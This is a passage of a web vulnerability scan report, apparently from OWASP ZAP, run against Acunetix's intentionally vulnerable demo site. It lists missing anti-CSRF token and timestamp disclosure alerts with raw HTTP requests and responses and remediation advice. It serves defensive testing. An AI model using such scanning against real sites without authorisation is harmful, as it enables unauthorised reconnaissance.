          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        25. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSignup" "tbPassword" "tbUsername" ].

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/rVVS1oArBGNWHuMPoCTb1Ib2vQA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						<span id="lblStatus">Subscription successfull. Please visit the login page to login.</span>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Signup.aspx" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

  6. Risk=, Confidence= (4)

    1. http://testaspnet.vulnweb.com (4)

      1. Timestamp Disclosure - Unix (4)
        1. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          190515149, which evaluates to: 1976-01-15 08:52:29

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
